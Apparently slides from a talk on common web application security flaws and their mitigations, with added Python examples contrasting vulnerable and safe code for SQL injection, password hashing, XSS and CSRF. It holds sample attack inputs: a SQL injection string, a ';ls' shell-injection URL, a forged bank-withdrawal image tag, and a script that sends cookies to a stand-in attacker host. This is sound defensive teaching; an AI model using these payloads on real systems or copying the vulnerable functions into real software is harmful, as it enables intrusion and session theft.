that looks vuln
common (web) application security issues,
and how to mitigate them
injection attacks
Allowing user input to leak to somewhere where it will be interpreted as code.
mandatory XKCD 327 link:
http://xkcd.com/327/
SQL
Username: "drevil' OR '1' = '1"
SELECT * FROM users WHERE is_admin = '1' AND name = 'drevil' OR '1' = '1';
Shell
www.mysite.com/viewcontent.php?filename=my_great_content.txt;ls
injection attacks: mitigation
Validate all external input.
Only allow exactly the kind of values you expect.
Disallow common "dangerous" characters,
enforce a maximum length
Always use context-aware escaping on output:
SQL-safe escapes for SQL,
HTML-safe escapes for HTML, etc.
There is no one-size-fits-all here
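The two injection examples above (the SQL username and the `;ls` filename), side by side with the mitigations on this slide, as an added Python example that is not part of the talk. The in-memory `users` table, the `SAFE_FILENAME` pattern and the helper names are assumptions made for the example:

```python
import re
import sqlite3

# Constructed in-memory stand-in for the talk's "users" table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, is_admin TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "1"), ("bob", "0"), ("drevil", "0")])
    return conn

# The payload from the slide, as it would arrive in the username field.
PAYLOAD = "drevil' OR '1' = '1"

def find_admin_vulnerable(conn, username):
    """String concatenation: the input is spliced into the SQL text,
    so the quote in the payload ends the literal and the OR clause becomes code."""
    sql = ("SELECT name FROM users WHERE is_admin = '1' AND name = '%s' "
           "ORDER BY name" % username)
    return [row[0] for row in conn.execute(sql)]

def find_admin_safe(conn, username):
    """Parameterized query: the driver sends the value separately from the
    statement, so the quotes and OR are just characters in a name."""
    sql = "SELECT name FROM users WHERE is_admin = '1' AND name = ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, (username,))]

# Allow-list for the viewcontent.php case: exactly the values we expect
# (a short word-ish name plus .txt), rejecting ';', '/', spaces and so on.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9_\-]{1,64}\.txt$")

def build_view_command(filename):
    """Return an argv list for the viewer instead of a shell string.
    Rejected names raise before anything could be executed."""
    if not SAFE_FILENAME.match(filename):
        raise ValueError("filename not in allowed format: %r" % filename)
    # Passing a list (no shell) means ';' would never be interpreted anyway;
    # the allow-list is the second layer of the same defense.
    return ["cat", filename]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_admin_vulnerable(db, PAYLOAD))   # every user
    print("safe:      ", find_admin_safe(db, PAYLOAD))         # nobody
    print(build_view_command("my_great_content.txt"))
    try:
        build_view_command("my_great_content.txt;ls")
    except ValueError as exc:
        print("rejected:", exc)
```

The vulnerable query returns every row because `AND` binds tighter than `OR`, so the condition becomes `(is_admin = '1' AND name = 'drevil') OR ('1' = '1')`. Escaping quotes would patch this one case; parameter binding removes the whole class.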
Buffer overflow/invalid pointers
http://0pointer.de/
Use a safe language
(although it is not a guarantee, you might still use libraries/third-party tools that are vulnerable)
Impose explicit size limits in APIs
(there are most likely implicit ones anyway)
no crypto
Sensitive data should be encrypted.
If it is stored encrypted, it should be transmitted encrypted,
not the other way around.
There is no good performance reason not to use SSL everywhere.
incorrectly used crypto
Worse than no crypto, now the attacker knows where the sensitive data is.
Examples
unsalted passwords
broken random numbers in initialization
Tor with an exit relay instead of end-to-end encryption
Mitigation
Don't roll your own.
Use NaCl or similar
WRONG crypto: mitigation
Don't roll your own!
Use high-level, well-known and trusted packages like
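The "unsalted passwords" and "broken random numbers" items from the examples slide, shown as an added Python example that is not from the talk. It uses only the standard library (`hashlib.pbkdf2_hmac`, `secrets`, `hmac`); the iteration count and the `salt$digest` storage format are assumptions for the example, and the two constructed user records are illustrative:

```python
import hashlib
import hmac
import secrets

ITERATIONS = 200_000  # assumed work factor; tune for your hardware

def hash_unsalted(password):
    """The mistake on the slide: a bare hash. Two users with the same
    password get the same digest, so one precomputed table cracks all."""
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password(password, salt=None):
    """Per-user random salt from the OS CSPRNG (secrets, never random.random),
    stretched with PBKDF2-HMAC-SHA256. Returns 'salthex$digesthex'."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        salt_hex, digest_hex = stored.split("$", 1)
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)

def same_password_detectable(stored_a, stored_b):
    """True if an attacker reading the table can tell two users share a
    password. With unsalted hashes this is a string comparison."""
    return stored_a == stored_b

if __name__ == "__main__":
    # Constructed users who happen to pick the same password.
    pw = "correct horse battery staple"
    print("unsalted collide:", same_password_detectable(hash_unsalted(pw), hash_unsalted(pw)))
    a, b = hash_password(pw), hash_password(pw)
    print("salted collide:  ", same_password_detectable(a, b))
    print("verify ok:       ", verify_password(pw, a))
    print("verify wrong:    ", verify_password("hunter2", a))
```

Salting is the fix for the storage problem; the slow KDF is what makes a single leaked record expensive to brute-force. Neither is "rolling your own": both primitives are standard and the code only wires them together.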
error handling
information leakage
Sending too much data in errors back to clients can reveal important information to an attacker.
(But don't overdo it, if done right, it can be perfectly fine to say why an error happened)
No/broken access control
Lock down sensitive endpoints
Don't put session keys in URLs, where they might get logged
Negotiate per-session secrets
Implement timeouts for sessions
cross site scripting
(XSS)
Injected JavaScript can take control of a user's actions on a vulnerable website
Mitigation
Prevent injection at both input and output
Use CSP headers
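The two XSS mitigations above, output escaping and a CSP header, as an added Python example that is not part of the talk. The HTML fragments, the `/search` URL and the policy string are assumptions made for the example; `html.escape` and `urllib.parse.quote` are standard-library functions:

```python
import html
from urllib.parse import quote

def render_comment_vulnerable(comment):
    """User text dropped straight into HTML: a <script> tag in the
    comment runs in every reader's browser."""
    return "<p>%s</p>" % comment

def render_comment_safe(comment):
    """HTML-context escaping: <, >, &, quotes become entities, so the
    browser shows the text instead of parsing it."""
    return "<p>%s</p>" % html.escape(comment, quote=True)

def render_search_link(user_query):
    """Different context, different escape: inside a URL the value is
    percent-encoded. HTML-escaping alone would leave '&' and '#' able
    to change the query structure."""
    return '<a href="/search?q=%s">search</a>' % quote(user_query, safe="")

def csp_headers():
    """Second layer: even if an escape is missed somewhere, inline scripts
    and scripts from other origins are refused by the browser."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'self'; frame-ancestors 'none'",
    }

def allows_inline_script(policy):
    """Small checker for the policy above: inline script is only allowed
    if script-src (or default-src as fallback) names 'unsafe-inline'."""
    directives = {}
    for part in policy.split(";"):
        part = part.strip()
        if part:
            name, _, values = part.partition(" ")
            directives[name] = values.split()
    sources = directives.get("script-src", directives.get("default-src", []))
    return "'unsafe-inline'" in sources

if __name__ == "__main__":
    # Constructed malicious comment.
    evil = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"
    print(render_comment_vulnerable(evil))
    print(render_comment_safe(evil))
    print(render_search_link("a&b#c"))
    print(csp_headers())
    print("inline allowed:", allows_inline_script(csp_headers()["Content-Security-Policy"]))
```

Escaping at output is what actually neutralises the payload; input validation on the comment would only catch the patterns you thought of. CSP catches the cases the escaping missed.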
csrf
Cross Site Request Forgery
Assuming that a logged-in browser can be trusted
Example:
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
CSRF mitigation
Secret tokens in all requests (hidden form value)
MAC/HMAC
Automatic logout
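The CSRF mitigations just listed (a secret per-request token, an HMAC over it, automatic logout), together with the per-session secrets and timeouts from the access-control slide, as an added Python example that is not part of the talk. The in-memory session store, the `sid:issued` message layout and the two timeout values are assumptions for the example; `hmac`, `secrets` and `hashlib` are standard library:

```python
import hashlib
import hmac
import secrets
import time

SESSION_IDLE_TTL = 15 * 60   # assumed: auto-logout after 15 min without a request
TOKEN_TTL = 10 * 60          # assumed: a form token is good for 10 min
SESSIONS = {}                # sid -> {"secret": bytes, "last_seen": float}

def _now(now):
    return time.time() if now is None else now

def create_session(now=None):
    """New session id (goes in a cookie, never in a URL) plus a
    negotiated per-session secret that only the server ever sees."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"secret": secrets.token_bytes(32), "last_seen": _now(now)}
    return sid

def get_session(sid, now=None):
    """Return the session, or None if unknown or idle too long (automatic logout)."""
    now = _now(now)
    sess = SESSIONS.get(sid)
    if sess is None:
        return None
    if now - sess["last_seen"] > SESSION_IDLE_TTL:
        del SESSIONS[sid]
        return None
    sess["last_seen"] = now
    return sess

def _mac(secret, sid, issued):
    return hmac.new(secret, ("%s:%s" % (sid, issued)).encode(), hashlib.sha256).hexdigest()

def csrf_token(sid, now=None):
    """Token to embed as a hidden form value: issue time plus an HMAC that
    binds it to this session. A cross-site <img> or auto-submitted form
    cannot read it, so it cannot supply it."""
    now = _now(now)
    sess = get_session(sid, now)
    if sess is None:
        raise PermissionError("no live session")
    issued = str(int(now))
    return issued + ":" + _mac(sess["secret"], sid, issued)

def verify_csrf(sid, token, now=None):
    """Accept a state-changing request only with a fresh, matching token."""
    now = _now(now)
    sess = get_session(sid, now)
    if sess is None:
        return False
    try:
        issued, mac = token.split(":", 1)
        issued_at = int(issued)
    except ValueError:
        return False
    if not hmac.compare_digest(mac, _mac(sess["secret"], sid, issued)):
        return False
    return now - issued_at <= TOKEN_TTL

if __name__ == "__main__":
    sid = create_session()
    tok = csrf_token(sid)
    print("with token:   ", verify_csrf(sid, tok))
    print("forged <img>: ", verify_csrf(sid, ""))          # the bank example: no token at all
    print("other session:", verify_csrf(create_session(), tok))
```

The bank withdrawal `<img>` from the example slide fails the check simply because the attacker's page never had the token. Binding the MAC to the session id means a token stolen from one session is useless in another, and the idle timeout bounds how long a hijacked cookie stays valid.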
keep up to date
OWASP top 10 list
https://www.owasp.org/index.php/Top_10_2013-Top_10
Watch CCC security nightmares,
don't repeat the mistakes of others
By cortex